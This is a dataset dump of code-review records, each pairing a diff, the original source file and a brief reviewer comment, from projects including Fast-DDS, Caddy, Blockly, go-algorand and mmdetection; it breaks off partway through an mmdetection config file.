patch
stringlengths
17
31.2k
y
int64
1
1
oldf
stringlengths
0
2.21M
idx
int64
1
1
id
int64
4.29k
68.4k
msg
stringlengths
8
843
proj
stringclasses
212 values
lang
stringclasses
9 values
@@ -149,6 +149,8 @@ void PDPSimpleListener::onNewCacheChangeAdded(RTPSReader* reader, const CacheCha { listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } + + return; // change already removed from history } }
1
// Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima). // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. /** * @file PDPSimpleListener.cpp * */ #include <fastrtps/rtps/builtin/discovery/participant/PDPSimpleListener.h> #include <fastrtps/rtps/builtin/discovery/participant/timedevent/RemoteParticipantLeaseDuration.h> #include <fastrtps/rtps/builtin/discovery/participant/PDPSimple.h> #include "../../../participant/RTPSParticipantImpl.h" #include <fastrtps/rtps/builtin/discovery/endpoint/EDP.h> #include <fastrtps/rtps/reader/RTPSReader.h> #include <fastrtps/rtps/history/ReaderHistory.h> #include <fastrtps/rtps/participant/ParticipantDiscoveryInfo.h> #include <fastrtps/rtps/participant/RTPSParticipantListener.h> #include <fastrtps/utils/TimeConversion.h> #include <mutex> #include <fastrtps/log/Log.h> namespace eprosima { namespace fastrtps{ namespace rtps { void PDPSimpleListener::onNewCacheChangeAdded(RTPSReader* reader, const CacheChange_t* const change_in) { CacheChange_t* change = (CacheChange_t*)(change_in); logInfo(RTPS_PDP,"SPDP Message received"); if(change->instanceHandle == c_InstanceHandle_Unknown) { if(!this->getKey(change)) { logWarning(RTPS_PDP,"Problem getting the key of the change, removing"); this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } } if(change->kind == ALIVE) { //LOAD INFORMATION IN TEMPORAL RTPSParticipant PROXY DATA ParticipantProxyData participant_data; CDRMessage_t msg(change->serializedPayload); 
if(participant_data.readFromCDRMessage(&msg)) { //AFTER CORRECTLY READING IT //CHECK IF IS THE SAME RTPSParticipant change->instanceHandle = participant_data.m_key; if(participant_data.m_guid == mp_SPDP->getRTPSParticipant()->getGuid()) { logInfo(RTPS_PDP,"Message from own RTPSParticipant, removing"); this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } // At this point we can release reader lock. reader->getMutex()->unlock(); //LOOK IF IS AN UPDATED INFORMATION ParticipantProxyData* pdata = nullptr; std::unique_lock<std::recursive_mutex> lock(*mp_SPDP->getMutex()); for (auto it = mp_SPDP->m_participantProxies.begin(); it != mp_SPDP->m_participantProxies.end();++it) { if(participant_data.m_key == (*it)->m_key) { pdata = (*it); break; } } auto status = (pdata == nullptr) ? ParticipantDiscoveryInfo::DISCOVERED_PARTICIPANT : ParticipantDiscoveryInfo::CHANGED_QOS_PARTICIPANT; if(pdata == nullptr) { //IF WE DIDNT FOUND IT WE MUST CREATE A NEW ONE pdata = new ParticipantProxyData(participant_data); pdata->isAlive = true; pdata->mp_leaseDurationTimer = new RemoteParticipantLeaseDuration(mp_SPDP, pdata, TimeConv::Time_t2MilliSecondsDouble(pdata->m_leaseDuration)); pdata->mp_leaseDurationTimer->restart_timer(); this->mp_SPDP->m_participantProxies.push_back(pdata); lock.unlock(); mp_SPDP->announceParticipantState(false); mp_SPDP->assignRemoteEndpoints(&participant_data); } else { pdata->updateData(participant_data); pdata->isAlive = true; lock.unlock(); if(mp_SPDP->m_discovery.use_STATIC_EndpointDiscoveryProtocol) mp_SPDP->mp_EDP->assignRemoteEndpoints(participant_data); } auto listener = this->mp_SPDP->getRTPSParticipant()->getListener(); if (listener != nullptr) { ParticipantDiscoveryInfo info; info.status = status; info.info = participant_data; listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } // Take again the reader lock reader->getMutex()->lock(); } } else { GUID_t guid; 
iHandle2GUID(guid, change->instanceHandle); ParticipantDiscoveryInfo info; info.status = ParticipantDiscoveryInfo::REMOVED_PARTICIPANT; this->mp_SPDP->lookupParticipantProxyData(guid, info.info); if(this->mp_SPDP->removeRemoteParticipant(guid)) { auto listener = this->mp_SPDP->getRTPSParticipant()->getListener(); if(listener != nullptr) { listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } } } //Remove change form history. this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } bool PDPSimpleListener::getKey(CacheChange_t* change) { return ParameterList::readInstanceHandleFromCDRMsg(change, PID_PARTICIPANT_GUID); } } } /* namespace rtps */ } /* namespace eprosima */
1
14,257
Then, where is it removed?
eProsima-Fast-DDS
cpp
@@ -16,6 +16,7 @@ func TestVHostTrie(t *testing.T) { "example.com/foo/bar", "*.example.com/test", }) + CaseSensitivePath = true assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", false, "", "/"}, {"example", true, "example", "/"},
1
package httpserver import ( "net/http" "net/http/httptest" "testing" ) func TestVHostTrie(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "example", "example.com", "*.example.com", "example.com/foo", "example.com/foo/bar", "*.example.com/test", }) assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", false, "", "/"}, {"example", true, "example", "/"}, {"example.com", true, "example.com", "/"}, {"example.com/test", true, "example.com", "/"}, {"example.com/foo", true, "example.com/foo", "/foo"}, {"example.com/foo/", true, "example.com/foo", "/foo"}, {"EXAMPLE.COM/foo", true, "example.com/foo", "/foo"}, {"EXAMPLE.COM/Foo", true, "example.com", "/"}, {"example.com/foo/bar", true, "example.com/foo/bar", "/foo/bar"}, {"example.com/foo/bar/baz", true, "example.com/foo/bar", "/foo/bar"}, {"example.com/foo/other", true, "example.com/foo", "/foo"}, {"foo.example.com", true, "*.example.com", "/"}, {"foo.example.com/else", true, "*.example.com", "/"}, }, false) } func TestVHostTrieWildcard1(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "example.com", "", }) assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", true, "", "/"}, {"example.com", true, "example.com", "/"}, {"example.com/foo", true, "example.com", "/"}, {"not-in-trie.com/asdf", true, "", "/"}, }, true) } func TestVHostTrieWildcard2(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "0.0.0.0/asdf", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/asdf/foo", true, "0.0.0.0/asdf", "/asdf"}, {"example.com/foo", false, "", "/"}, {"host/asdf", true, "0.0.0.0/asdf", "/asdf"}, }, true) } func TestVHostTrieWildcard3(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "*/foo", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/foo", true, "*/foo", "/foo"}, {"example.com", false, "", "/"}, }, true) } func TestVHostTriePort(t *testing.T) { // Make sure port is stripped out trie := newVHostTrie() 
populateTestTrie(trie, []string{ "example.com:1234", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/foo", true, "example.com:1234", "/"}, }, true) } func populateTestTrie(trie *vhostTrie, keys []string) { for _, key := range keys { // we wrap this in a func, passing in the key, otherwise the // handler always writes the last key to the response, even // if the handler is actually from one of the earlier keys. func(key string) { site := &SiteConfig{ middlewareChain: HandlerFunc(func(w http.ResponseWriter, r *http.Request) (int, error) { w.Write([]byte(key)) return 0, nil }), } trie.Insert(key, site) }(key) } } type vhostTrieTest struct { query string expectMatch bool expectedKey string matchedPrefix string // the path portion of a key that is expected to be matched } func assertTestTrie(t *testing.T, trie *vhostTrie, tests []vhostTrieTest, hasWildcardHosts bool) { for i, test := range tests { site, pathPrefix := trie.Match(test.query) if !test.expectMatch { if site != nil { // If not expecting a value, then just make sure we didn't get one t.Errorf("Test %d: Expected no matches, but got %v", i, site) } continue } // Otherwise, we must assert we got a value if site == nil { t.Errorf("Test %d: Expected non-nil return value, but got: %v", i, site) continue } // And it must be the correct value resp := httptest.NewRecorder() site.middlewareChain.ServeHTTP(resp, nil) actualHandlerKey := resp.Body.String() if actualHandlerKey != test.expectedKey { t.Errorf("Test %d: Expected match '%s' but matched '%s'", i, test.expectedKey, actualHandlerKey) } // The path prefix must also be correct if test.matchedPrefix != pathPrefix { t.Errorf("Test %d: Expected matched path prefix to be '%s', got '%s'", i, test.matchedPrefix, pathPrefix) } } }
1
10,348
The tests are not run concurrently? (I don't know. Better check.)
caddyserver-caddy
go
@@ -131,7 +131,7 @@ Blockly.FieldTextInput.prototype.showEditor_ = function(opt_quietInput) { var htmlInput = goog.dom.createDom('input', 'blocklyHtmlInput'); htmlInput.setAttribute('spellcheck', this.spellcheck_); var fontSize = - (Blockly.FieldTextInput.FONTSIZE * this.workspace_.scale) + 'pt'; + (Blockly.FieldTextInput.FONTSIZE) + 'pt'; div.style.fontSize = fontSize; htmlInput.style.fontSize = fontSize; /** @type {!HTMLInputElement} */
1
/** * @license * Visual Blocks Editor * * Copyright 2012 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Text input field. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.FieldTextInput'); goog.require('Blockly.BlockSvg.render'); goog.require('Blockly.Field'); goog.require('Blockly.Msg'); goog.require('goog.asserts'); goog.require('goog.dom'); goog.require('goog.userAgent'); /** * Class for an editable text field. * @param {string} text The initial content of the field. * @param {Function=} opt_validator An optional function that is called * to validate any constraints on what the user entered. Takes the new * text as an argument and returns either the accepted text, a replacement * text, or null to abort the change. * @extends {Blockly.Field} * @constructor */ Blockly.FieldTextInput = function(text, opt_validator) { Blockly.FieldTextInput.superClass_.constructor.call(this, text, opt_validator); }; goog.inherits(Blockly.FieldTextInput, Blockly.Field); /** * Point size of text. Should match blocklyText's font-size in CSS. */ Blockly.FieldTextInput.FONTSIZE = 11; /** * Mouse cursor style when over the hotspot that initiates the editor. */ Blockly.FieldTextInput.prototype.CURSOR = 'text'; /** * Allow browser to spellcheck this field. * @private */ Blockly.FieldTextInput.prototype.spellcheck_ = true; /** * Close the input widget if this input is being deleted. 
*/ Blockly.FieldTextInput.prototype.dispose = function() { Blockly.WidgetDiv.hideIfOwner(this); Blockly.FieldTextInput.superClass_.dispose.call(this); }; /** * Set the text in this field. * @param {?string} text New text. * @override */ Blockly.FieldTextInput.prototype.setValue = function(text) { if (text === null) { return; // No change if null. } if (this.sourceBlock_ && this.validator_) { var validated = this.validator_(text); // If the new text is invalid, validation returns null. // In this case we still want to display the illegal result. if (validated !== null && validated !== undefined) { text = validated; } } Blockly.Field.prototype.setValue.call(this, text); }; /** * Set whether this field is spellchecked by the browser. * @param {boolean} check True if checked. */ Blockly.FieldTextInput.prototype.setSpellcheck = function(check) { this.spellcheck_ = check; }; /** * Show the inline free-text editor on top of the text. * @param {boolean=} opt_quietInput True if editor should be created without * focus. Defaults to false. * @private */ Blockly.FieldTextInput.prototype.showEditor_ = function(opt_quietInput) { this.workspace_ = this.sourceBlock_.workspace; var quietInput = opt_quietInput || false; if (!quietInput && (goog.userAgent.MOBILE || goog.userAgent.ANDROID || goog.userAgent.IPAD)) { // Mobile browsers have issues with in-line textareas (focus & keyboards). var newValue = window.prompt(Blockly.Msg.CHANGE_VALUE_TITLE, this.text_); if (this.sourceBlock_ && this.validator_) { var override = this.validator_(newValue); if (override !== undefined) { newValue = override; } } this.setValue(newValue); return; } Blockly.WidgetDiv.show(this, this.sourceBlock_.RTL, this.widgetDispose_()); var div = Blockly.WidgetDiv.DIV; // Create the input. 
var htmlInput = goog.dom.createDom('input', 'blocklyHtmlInput'); htmlInput.setAttribute('spellcheck', this.spellcheck_); var fontSize = (Blockly.FieldTextInput.FONTSIZE * this.workspace_.scale) + 'pt'; div.style.fontSize = fontSize; htmlInput.style.fontSize = fontSize; /** @type {!HTMLInputElement} */ Blockly.FieldTextInput.htmlInput_ = htmlInput; div.appendChild(htmlInput); htmlInput.value = htmlInput.defaultValue = this.text_; htmlInput.oldValue_ = null; this.validate_(); this.resizeEditor_(); if (!quietInput) { htmlInput.focus(); htmlInput.select(); } // Bind to keydown -- trap Enter without IME and Esc to hide. htmlInput.onKeyDownWrapper_ = Blockly.bindEvent_(htmlInput, 'keydown', this, this.onHtmlInputKeyDown_); // Bind to keyup -- trap Enter; resize after every keystroke. htmlInput.onKeyUpWrapper_ = Blockly.bindEvent_(htmlInput, 'keyup', this, this.onHtmlInputChange_); // Bind to keyPress -- repeatedly resize when holding down a key. htmlInput.onKeyPressWrapper_ = Blockly.bindEvent_(htmlInput, 'keypress', this, this.onHtmlInputChange_); htmlInput.onWorkspaceChangeWrapper_ = this.resizeEditor_.bind(this); this.workspace_.addChangeListener(htmlInput.onWorkspaceChangeWrapper_); }; /** * Handle key down to the editor. * @param {!Event} e Keyboard event. * @private */ Blockly.FieldTextInput.prototype.onHtmlInputKeyDown_ = function(e) { var htmlInput = Blockly.FieldTextInput.htmlInput_; var tabKey = 9, enterKey = 13, escKey = 27; if (e.keyCode == enterKey) { Blockly.WidgetDiv.hide(); } else if (e.keyCode == escKey) { htmlInput.value = htmlInput.defaultValue; Blockly.WidgetDiv.hide(); } else if (e.keyCode == tabKey) { Blockly.WidgetDiv.hide(); this.sourceBlock_.tab(this, !e.shiftKey); e.preventDefault(); } }; /** * Handle a change to the editor. * @param {!Event} e Keyboard event. * @private */ Blockly.FieldTextInput.prototype.onHtmlInputChange_ = function(e) { var htmlInput = Blockly.FieldTextInput.htmlInput_; // Update source block. 
var text = htmlInput.value; if (text !== htmlInput.oldValue_) { htmlInput.oldValue_ = text; this.setValue(text); this.validate_(); } else if (goog.userAgent.WEBKIT) { // Cursor key. Render the source block to show the caret moving. // Chrome only (version 26, OS X). this.sourceBlock_.render(); } this.resizeEditor_(); }; /** * Check to see if the contents of the editor validates. * Style the editor accordingly. * @private */ Blockly.FieldTextInput.prototype.validate_ = function() { var valid = true; goog.asserts.assertObject(Blockly.FieldTextInput.htmlInput_); var htmlInput = Blockly.FieldTextInput.htmlInput_; if (this.sourceBlock_ && this.validator_) { valid = this.validator_(htmlInput.value); } if (valid === null) { Blockly.addClass_(htmlInput, 'blocklyInvalidInput'); } else { Blockly.removeClass_(htmlInput, 'blocklyInvalidInput'); } }; /** * Resize the editor and the underlying block to fit the text. * @private */ Blockly.FieldTextInput.prototype.resizeEditor_ = function() { var div = Blockly.WidgetDiv.DIV; var bBox = this.fieldGroup_.getBBox(); var height = bBox.height * this.sourceBlock_.workspace.scale; var width = Math.max( bBox.width, Blockly.BlockSvg.FIELD_WIDTH-Blockly.BlockSvg.SEP_SPACE_X) * this.sourceBlock_.workspace.scale div.style.width = width + 'px'; div.style.height = height + 'px'; var xy = this.getAbsoluteXY_(); xy.x += Blockly.BlockSvg.SEP_SPACE_X * this.sourceBlock_.workspace.scale; // @todo Why 3? xy.y += (Blockly.BlockSvg.FIELD_HEIGHT * this.sourceBlock_.workspace.scale)/2 - height/2 + 3; // In RTL mode block fields and LTR input fields the left edge moves, // whereas the right edge is fixed. Reposition the editor. if (this.sourceBlock_.RTL) { var borderBBox = this.getScaledBBox_(); xy.x += borderBBox.width; xy.x -= div.offsetWidth; } // Shift by a few pixels to line up exactly. 
xy.y += 1; if (goog.userAgent.GECKO && Blockly.WidgetDiv.DIV.style.top) { // Firefox mis-reports the location of the border by a pixel // once the WidgetDiv is moved into position. xy.x -= 1; xy.y -= 1; } if (goog.userAgent.WEBKIT) { xy.y -= 3; } div.style.left = xy.x + 'px'; div.style.top = xy.y + 'px'; }; /** * Close the editor, save the results, and dispose of the editable * text field's elements. * @return {!Function} Closure to call on destruction of the WidgetDiv. * @private */ Blockly.FieldTextInput.prototype.widgetDispose_ = function() { var thisField = this; return function() { var htmlInput = Blockly.FieldTextInput.htmlInput_; // Save the edit (if it validates). var text = htmlInput.value; if (thisField.sourceBlock_ && thisField.validator_) { var text1 = thisField.validator_(text); if (text1 === null) { // Invalid edit. text = htmlInput.defaultValue; } else if (text1 !== undefined) { // Validation function has changed the text. text = text1; } } thisField.setValue(text); thisField.sourceBlock_.rendered && thisField.sourceBlock_.render(); Blockly.unbindEvent_(htmlInput.onKeyDownWrapper_); Blockly.unbindEvent_(htmlInput.onKeyUpWrapper_); Blockly.unbindEvent_(htmlInput.onKeyPressWrapper_); thisField.workspace_.removeChangeListener( htmlInput.onWorkspaceChangeWrapper_); Blockly.FieldTextInput.htmlInput_ = null; // Delete style properties. var style = Blockly.WidgetDiv.DIV.style; style.width = 'auto'; style.height = 'auto'; style.fontSize = ''; }; }; /** * Ensure that only a number may be entered. * @param {string} text The user's text. * @return {?string} A string representing a valid number, or null if invalid. */ Blockly.FieldTextInput.numberValidator = function(text) { if (text === null) { return null; } text = String(text); // TODO: Handle cases like 'ten', '1.203,14', etc. // 'O' is sometimes mistaken for '0' by inexperienced users. text = text.replace(/O/ig, '0'); // Strip out thousands separators. 
text = text.replace(/,/g, ''); var n = parseFloat(text || 0); return isNaN(n) ? null : String(n); }; /** * Ensure that only a nonnegative integer may be entered. * @param {string} text The user's text. * @return {?string} A string representing a valid int, or null if invalid. */ Blockly.FieldTextInput.nonnegativeIntegerValidator = function(text) { var n = Blockly.FieldTextInput.numberValidator(text); if (n) { n = String(Math.max(0, Math.floor(n))); } return n; };
1
7,575
Regardless of scale?
LLK-scratch-blocks
js
@@ -44,6 +44,14 @@ var dataDirectory = flag.String("d", "", "Root Algorand daemon data path") var versionCheck = flag.Bool("v", false, "Display and write current build version and exit") var telemetryOverride = flag.String("t", "", `Override telemetry setting if supported (Use "true", "false", "0" or "1")`) +// the following flags aren't being used by the algoh, but are needed so that the flag package won't complain that +// these flags were provided but were not defined. We grab all the input flags and pass these downstream to the algod executable +// as an input arguments. +var peerOverride = flag.String("p", "", "Override phonebook with peer ip:port (or semicolon separated list: ip:port;ip:port;ip:port...)") +var listenIP = flag.String("l", "", "Override config.EndpointAddress (REST listening address) with ip:port") +var seed = flag.String("seed", "", "input to math/rand.Seed()") +var genesisFile = flag.String("g", "", "Genesis configuration file") + const algodFileName = "algod" const goalFileName = "goal"
1
// Copyright (C) 2019-2020 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package main import ( "flag" "fmt" "io/ioutil" "os" "os/exec" "os/signal" "path/filepath" "sync" "syscall" "time" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/crypto" "github.com/algorand/go-algorand/daemon/algod/api/client" "github.com/algorand/go-algorand/data/bookkeeping" "github.com/algorand/go-algorand/logging" "github.com/algorand/go-algorand/logging/telemetryspec" "github.com/algorand/go-algorand/nodecontrol" "github.com/algorand/go-algorand/shared/algoh" "github.com/algorand/go-algorand/tools/network" "github.com/algorand/go-algorand/util" ) var dataDirectory = flag.String("d", "", "Root Algorand daemon data path") var versionCheck = flag.Bool("v", false, "Display and write current build version and exit") var telemetryOverride = flag.String("t", "", `Override telemetry setting if supported (Use "true", "false", "0" or "1")`) const algodFileName = "algod" const goalFileName = "goal" var exeDir string func init() { } type stdCollector struct { output string } func (c *stdCollector) Write(p []byte) (n int, err error) { s := string(p) c.output += s return len(p), nil } func main() { blockWatcherInitialized := false flag.Parse() nc := getNodeController() genesis, err := nc.GetGenesis() if err != nil { 
fmt.Fprintln(os.Stdout, "error loading telemetry config", err) return } dataDir := ensureDataDir() absolutePath, absPathErr := filepath.Abs(dataDir) config.UpdateVersionDataDir(absolutePath) if *versionCheck { fmt.Println(config.FormatVersionAndLicense()) return } // If data directory doesn't exist, we can't run. Don't bother trying. if len(dataDir) == 0 { fmt.Fprintln(os.Stderr, "Data directory not specified. Please use -d or set $ALGORAND_DATA in your environment.") os.Exit(1) } if absPathErr != nil { reportErrorf("Can't convert data directory's path to absolute, %v\n", dataDir) } if _, err := os.Stat(absolutePath); err != nil { reportErrorf("Data directory %s does not appear to be valid\n", dataDir) } algohConfig, err := algoh.LoadConfigFromFile(filepath.Join(dataDir, algoh.ConfigFilename)) if err != nil && !os.IsNotExist(err) { reportErrorf("Error loading configuration, %v\n", err) } validateConfig(algohConfig) done := make(chan struct{}) log := logging.Base() configureLogging(genesis, log, absolutePath, done) defer log.CloseTelemetry() exeDir, err = util.ExeDir() if err != nil { reportErrorf("Error getting ExeDir: %v\n", err) } var errorOutput stdCollector var output stdCollector go func() { args := make([]string, len(os.Args)-1) copy(args, os.Args[1:]) // Copy our arguments (skip the executable) if log.GetTelemetryEnabled() { args = append(args, "-s", log.GetTelemetrySession()) } algodPath := filepath.Join(exeDir, algodFileName) cmd := exec.Command(algodPath, args...) cmd.Stderr = &errorOutput cmd.Stdout = &output err = cmd.Start() if err != nil { reportErrorf("error starting algod: %v", err) } err = cmd.Wait() if err != nil { reportErrorf("error waiting for algod: %v", err) } close(done) // capture logs if algod terminated prior to blockWatcher starting if !blockWatcherInitialized { captureErrorLogs(algohConfig, errorOutput, output, absolutePath, true) } log.Infoln("++++++++++++++++++++++++++++++++++++++++") log.Infoln("algod exited. 
Exiting...") log.Infoln("++++++++++++++++++++++++++++++++++++++++") }() // Set up error capturing defer func() { captureErrorLogs(algohConfig, errorOutput, output, absolutePath, false) }() // Handle signals cleanly c := make(chan os.Signal) signal.Notify(c, os.Interrupt, syscall.SIGTERM, syscall.SIGINT) signal.Ignore(syscall.SIGHUP) go func() { sig := <-c fmt.Printf("Exiting algoh on %v\n", sig) os.Exit(0) }() algodClient, err := waitForClient(nc, done) if err != nil { reportErrorf("error creating Rest Client: %v\n", err) } var wg sync.WaitGroup deadMan := makeDeadManWatcher(algohConfig.DeadManTimeSec, algodClient, algohConfig.UploadOnError, done, &wg) wg.Add(1) listeners := []blockListener{deadMan} if algohConfig.SendBlockStats { // Note: Resume can be implemented here. Store blockListener state and set curBlock based on latestBlock/lastBlock. listeners = append(listeners, &blockstats{log: logging.Base()}) } delayBetweenStatusChecks := time.Duration(algohConfig.StatusDelayMS) * time.Millisecond stallDetectionDelay := time.Duration(algohConfig.StallDelayMS) * time.Millisecond runBlockWatcher(listeners, algodClient, done, &wg, delayBetweenStatusChecks, stallDetectionDelay) wg.Add(1) blockWatcherInitialized = true wg.Wait() fmt.Println("Exiting algoh normally...") } func waitForClient(nc nodecontrol.NodeController, abort chan struct{}) (client client.RestClient, err error) { for { client, err = getRestClient(nc) if err == nil { return client, nil } select { case <-abort: err = fmt.Errorf("aborted waiting for client") return case <-time.After(100 * time.Millisecond): } } } func getRestClient(nc nodecontrol.NodeController) (rc client.RestClient, err error) { // Fetch the algod client algodClient, err := nc.AlgodClient() if err != nil { return } // Make sure the node is running _, err = algodClient.Status() if err != nil { return } return algodClient, nil } func resolveDataDir() string { // Figure out what data directory to tell algod to use. 
// If not specified on cmdline with '-d', look for default in environment. var dir string if dataDirectory == nil || *dataDirectory == "" { dir = os.Getenv("ALGORAND_DATA") } else { dir = *dataDirectory } return dir } func ensureDataDir() string { // Get the target data directory to work against, // then handle the scenario where no data directory is provided. dir := resolveDataDir() if dir == "" { reportErrorf("Data directory not specified. Please use -d or set $ALGORAND_DATA in your environment. Exiting.\n") } return dir } func getNodeController() nodecontrol.NodeController { binDir, err := util.ExeDir() if err != nil { panic(err) } nc := nodecontrol.MakeNodeController(binDir, ensureDataDir()) return nc } func configureLogging(genesis bookkeeping.Genesis, log logging.Logger, rootPath string, abort chan struct{}) { log = logging.Base() liveLog := fmt.Sprintf("%s/host.log", rootPath) fmt.Println("Logging to: ", liveLog) writer, err := os.OpenFile(liveLog, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666) if err != nil { panic(fmt.Sprintf("configureLogging: cannot open log file %v", err)) } log.SetOutput(writer) log.SetJSONFormatter() log.SetLevel(logging.Debug) initTelemetry(genesis, log, rootPath, abort) // if we have the telemetry enabled, we want to use it's sessionid as part of the // collected metrics decorations. 
fmt.Fprintln(writer, "++++++++++++++++++++++++++++++++++++++++") fmt.Fprintln(writer, "Logging Starting") fmt.Fprintln(writer, "++++++++++++++++++++++++++++++++++++++++") } func initTelemetry(genesis bookkeeping.Genesis, log logging.Logger, dataDirectory string, abort chan struct{}) { // Enable telemetry hook in daemon to send logs to cloud // If ALGOTEST env variable is set, telemetry is disabled - allows disabling telemetry for tests isTest := os.Getenv("ALGOTEST") != "" if !isTest { telemetryConfig, err := logging.EnsureTelemetryConfig(&dataDirectory, genesis.ID()) if err != nil { fmt.Fprintln(os.Stdout, "error loading telemetry config", err) return } // Apply telemetry override. telemetryConfig.Enable = logging.TelemetryOverride(*telemetryOverride) if telemetryConfig.Enable { err = log.EnableTelemetry(telemetryConfig) if err != nil { fmt.Fprintln(os.Stdout, "error creating telemetry hook", err) return } if log.GetTelemetryEnabled() { cfg, err := config.LoadConfigFromDisk(dataDirectory) if err != nil && !os.IsNotExist(err) { log.Fatalf("Cannot load config: %v", err) } // If the telemetry URI is not set, periodically check SRV records for new telemetry URI if log.GetTelemetryURI() == "" { network.StartTelemetryURIUpdateService(time.Minute, cfg, genesis.Network, log, abort) } // For privacy concerns, we don't want to provide the full data directory to telemetry. // But to be useful where multiple nodes are installed for convenience, we should be // able to discriminate between instances with the last letter of the path. 
if dataDirectory != "" { dataDirectory = dataDirectory[len(dataDirectory)-1:] } currentVersion := config.GetCurrentVersion() startupDetails := telemetryspec.StartupEventDetails{ Version: currentVersion.String(), CommitHash: currentVersion.CommitHash, Branch: currentVersion.Branch, Channel: currentVersion.Channel, InstanceHash: crypto.Hash([]byte(dataDirectory)).String(), } log.EventWithDetails(telemetryspec.HostApplicationState, telemetryspec.StartupEvent, startupDetails) } } } } // capture algod error output and optionally upload logs func captureErrorLogs(algohConfig algoh.HostConfig, errorOutput stdCollector, output stdCollector, absolutePath string, errorCondition bool) { if errorOutput.output != "" { fmt.Fprintf(os.Stdout, "errorOutput.output: `%s`\n", errorOutput.output) errorCondition = true fmt.Fprintf(os.Stderr, errorOutput.output) details := telemetryspec.ErrorOutputEventDetails{ Error: errorOutput.output, Output: output.output, } log.EventWithDetails(telemetryspec.HostApplicationState, telemetryspec.ErrorOutputEvent, details) // Write stdout & stderr streams to disk _ = ioutil.WriteFile(filepath.Join(absolutePath, nodecontrol.StdOutFilename), []byte(output.output), os.ModePerm) _ = ioutil.WriteFile(filepath.Join(absolutePath, nodecontrol.StdErrFilename), []byte(errorOutput.output), os.ModePerm) } if errorCondition && algohConfig.UploadOnError { fmt.Fprintf(os.Stdout, "Uploading logs...\n") sendLogs() } } func reportErrorf(format string, args ...interface{}) { fmt.Fprintf(os.Stderr, format, args...) logging.Base().Fatalf(format, args...) } func sendLogs() { var args []string args = append(args, "-d", ensureDataDir()) args = append(args, "logging", "send") goalPath := filepath.Join(exeDir, goalFileName) cmd := exec.Command(goalPath, args...) 
err := cmd.Run() if err != nil { reportErrorf("Error sending logs: %v\n", err) } } func validateConfig(config algoh.HostConfig) { // Enforce a reasonable deadman timeout if config.DeadManTimeSec > 0 && config.DeadManTimeSec < 30 { reportErrorf("Config.DeadManTimeSec should be >= 30 seconds (set to %v)\n", config.DeadManTimeSec) } }
1
39,037
Nit: should not we hide them from printing out?
algorand-go-algorand
go
@@ -196,7 +196,7 @@ test_pipeline = [ dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size_divisor=32), - dict(type='ImageToTensor', keys=['img']), + dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img']), ]) ]
1
# model settings model = dict( type='MaskRCNN', pretrained='torchvision://resnet50', backbone=dict( type='ResNet', depth=50, num_stages=4, out_indices=(0, 1, 2, 3), frozen_stages=1, style='pytorch'), neck=dict( type='FPN', in_channels=[256, 512, 1024, 2048], out_channels=256, num_outs=5), rpn_head=dict( type='RPNHead', in_channels=256, feat_channels=256, anchor_scales=[8], anchor_ratios=[0.5, 1.0, 2.0], anchor_strides=[4, 8, 16, 32, 64], target_means=[.0, .0, .0, .0], target_stds=[1.0, 1.0, 1.0, 1.0], loss_cls=dict( type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0), loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)), bbox_roi_extractor=dict( type='SingleRoIExtractor', roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2), out_channels=256, featmap_strides=[4, 8, 16, 32]), bbox_head=dict( type='SharedFCBBoxHead', num_fcs=2, in_channels=256, fc_out_channels=1024, roi_feat_size=7, num_classes=81, target_means=[0., 0., 0., 0.], target_stds=[0.1, 0.1, 0.2, 0.2], reg_class_agnostic=False, loss_cls=dict( type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0), loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)), mask_roi_extractor=dict( type='SingleRoIExtractor', roi_layer=dict(type='RoIAlign', out_size=14, sample_num=2), 